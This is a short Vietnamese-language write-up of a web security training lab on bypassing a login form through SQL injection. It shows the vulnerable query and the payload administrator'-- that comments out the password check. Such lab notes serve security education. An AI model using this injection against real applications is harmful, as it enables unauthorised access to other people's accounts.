Lab: Subvering application logic

SQL injection vulnerability allowing login bypass

Mô tả

Phòng thí nghiệm này chứa lỗ hổng SQL injection trong chức năng đăng nhập.

Yêu cầu: Thực hiện một cuộc tấn công tiêm SQLi để đăng nhập vào ứng dụng với tư cách là administratorngười dùng

Phân tích

Request thu được trên Burp Suite với thông tin đăng nhập không hợp lệ

Ứng dụng thực hiện truy vấn

SELECT * FROM users WHERE username = 'loilt' AND password = '123456'

Giải pháp

Gửi tên người dùng administrator'--và mật khẩu bất kỳ

hoặc sử dụng Burp Proxy để sửa đổi request sẽ dẫn đến truy vấn sau:

SELECT * FROM users WHERE username = 'administrator'--' AND password = 'any'

Truy vấn này sẽ bỏ qua kiểm tra mật khẩu trong mệnh đề WHERE

PreviousLab: Retrieving hidden dataNextSQL injection UNION attacks

Last updated